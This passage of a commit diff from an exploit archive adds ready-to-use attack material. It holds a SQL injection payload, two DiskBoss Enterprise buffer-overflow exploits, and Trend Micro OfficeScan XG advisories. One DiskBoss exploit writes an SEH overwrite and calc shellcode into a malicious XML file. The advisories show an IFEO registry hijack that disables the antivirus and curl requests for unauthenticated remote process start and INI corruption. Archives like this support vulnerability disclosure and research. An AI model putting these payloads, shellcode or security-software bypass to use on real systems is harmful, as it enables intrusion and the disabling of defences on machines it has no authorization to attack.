http://localhost/[path]/article.php?id=8' AND 7160=7160 AND 'cbgz'='cbgz
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=8' AND 7160=7160 AND 'cbgz'='cbgz
==================
8bitsec - [https://twitter.com/_8bitsec]

32
platforms/windows/dos/42917.py Executable file
View file

@ -0,0 +1,32 @@
#!/usr/bin/python
#========================================================================================================================
# Exploit Author: Touhid M.Shaikh
# Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(PoC)
# Date: 28-09-2017
# Website: www.touhidshaikh.com
# Vulnerable Software: DiskBoss Enterprise v8.4.16
# Vendor Homepage: http://www.diskboss.com
# Version: v8.4.16
# Software Link: http://www.diskboss.com/downloads.html
# Tested On: Windows 7 x86
#
#
# To reproduce the exploit:
# 1. Click Server
# 2. Click Connect
# 3. In the "Share Name" field, paste the content of buffer.txt , And try
to connect.........BOOoom....
#
#========================================================================================================================
junk = "A"*1312
EIP = "B"*4 #EIP overwritten
b = junk+EIP+"D"*500
f = open('buffer.txt','w')
f.write(b)
f.close()

113
platforms/windows/local/42890.txt Executable file
View file

@ -0,0 +1,113 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-IMAGE-FILE-EXECUTION-BYPASS.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.trendmicro.com
Product:
========
OfficeScan
v11.0 and XG (12.0)*
OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
Vulnerability Type:
===================
Image File Execution Bypass
CVE Reference:
==============
N/A
Security Issue:
================
OfficeScan XG "Unauthorized Change Prevention Service" is a Local SYSTEM service that is supposed to protect OfficeScan processes
like "PccNTMon.exe" from being terminated, and also prevents unauthorized arbitrary registry settings being made to the protected
machine even by an Administrator.
However, we can easily bypass by exploiting Windows Image File Execution Options (IFEO) to hijack the service process.
IFEO has been used by malwares for some time to prevent process from running or execute a process of an attackers choosing in
place of the process the user expects.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
All an attacker needs to do is create a registry key in IFEO with the same name as "TMBMSRV.exe" which is used by the
"Trend Micro Unauthorized Change Prevention Service" SYSTEM service. After creating this registry key we create a "string value"
named debugger pointing to say "calc.exe", we wait and once system reboots BOOM!
References:
===========
https://success.trendmicro.com/solution/1118372
Exploit/POC:
=============
Reproduction:
1) Open registry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
2) Create a new Key with no name
3) Create a new string value under the new key named "debugger" with value of c:\Windows\system32\calc.exe
4) Rename the created key to TMBMSRV.exe
5) Reboot system
Done!
We can then not only Kill TM but write to TrendMicro whitelist key in the registry for our evil binary to be left alone in peace.
Network Access:
===============
Local
Severity:
=========
High
Disclosure Timeline:
=================================
Vendor Notification: June 28, 2017
Vendor Reply: "Officescan Build 1222 which is affected by this bug was already pulled and is no longer available for public download"
Vendor Reply: "created hotfixes for product improvement."
September 28, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

68
platforms/windows/local/42918.py Executable file
View file

@ -0,0 +1,68 @@
#!/usr/bin/python
#========================================================================================================================
# Exploit Author: Touhid M.Shaikh
# Exploit Title: DiskBoss Enterprise v8.4.16 "Import Command" Buffer
Overflow
# Date: 29-09-2017
# Website: www.touhidshaikh.com
# Contact: https://github.com/touhidshaikh
# Vulnerable Software: DiskBoss Enterprise v8.4.16
# Vendor Homepage: http://www.diskboss.com
# Version: v8.4.16
# Software Link: http://www.diskboss.com/downloads.html
# Tested On: Windows 7 x86
#
#
# To reproduce the exploit:
# 1. right Click, click on Import Command
# 2. select evil.xml , Booom Calc POPED up.. ;)
#========================================================================================================================
import os,struct
import sys
#offset to eip
junk = "A" * (1560)
#JMP ESP (QtGui4.dll)
jmp1 = struct.pack('<L',0x651bb77a)
#NOPS
nops = "\x90"
#LEA EAX, [ESP+76]
esp = "\x8D\x44\x24\x4c"
#JMP ESP
jmp2 = "\xFF\xE0"
#Jump short 5
nseh = "\x90\x90\xEB\x05"
#POP POP RET
seh = struct.pack('<L',0x6501DE41)
#CALC.EXE pop shellcode
shellcode =
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
# FINAL PAYLOAD
buf = junk + jmp1 + nops * 16 + esp + jmp2 + nops * 90 + nseh + seh + nops
* 10 + shellcode
#FILE
file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + buf +
'\n</classify>'
f = open('evil.xml', 'w')
f.write(file)
f.close()
#GREETZ ----------
#Taushif(Brother)
#-----------------

135
platforms/windows/webapps/42892.txt Executable file
View file

@ -0,0 +1,135 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14086-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-START-REMOTE-PROCESS-CODE-EXECUTION-MEM-CORRUPT.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.trendmicro.com
Product:
========
OfficeScan XG
v11.0 and (12.0)*
Vulnerability Type:
===================
Unauthorized Start Remote Process Code Execution
Unauthorized Denial Of Service - INI Corruption
OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
CVE Reference:
==============
CVE-2017-14086
Security Issue:
================
Remote unauthenticated attackers who connect to the OfficeScan XG application can temporarily start the "fcgiOfcDDA.exe" executable
this process will run for short time before dies, server disk space may also be consumed with dump files by making continous HTTP requests.
References:
===========
https://success.trendmicro.com/solution/1118372
Exploit/POC Start Remote Process Code Execution:
================================================
c:\> curl -k https://VICTIM-IP:4343/officescan/console/CGI/
HTTP response:
403 - Forbidden: Access is denied.
You do not have permission to view this directory or page using the credentials that you supplied
But, we can access it directly :)
c:\> curl -v -k https://VICTIM-IP:4343/officescan/console/CGI/fcgiOfcDDA.exe
HTTP Response:
500 - Internal server error.
There is a problem with the resource you are looking for, and it cannot be displayed.
The EXE is called then runs for short time before .DMP is generated.
fcgiOfcDDA.exe.6808.dmp
The stored exception information can be accessed via .ecxr.
(568.112c): Unknown exception - code c000000d (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll -
eax=00000000 ebx=0014f780 ecx=00000000 edx=00000000 esi=00000002 edi=00000000
eip=77d9016d esp=0014f730 ebp=0014f7cc iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!NtWaitForMultipleObjects+0x15:
Exploit/POC (Denial Of Service / INI Corruption):
==================================================
[root@localhost /]# curl -v -k https://VICTIM-IP:4343/officescan/CGI/cgiRqUpd.exe
* About to connect() to VICTIM-IP port 4343
* Trying VICTIM-IP.. connected
<HTTP/1.1 200 OK
< Pragma: no-cache
< Content-Type: text/plain;charset=iso-8859-1
< Server: Microsoft-IIS/7.5
< X-Powered-By: ASP.NET
< Date: Fri, 02 Jun 2017 18:00:36 GMT
< Connection: close
< Content-Length: 22
[INI_UPDATE_SECTION]
BOOOM!
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: June 2, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx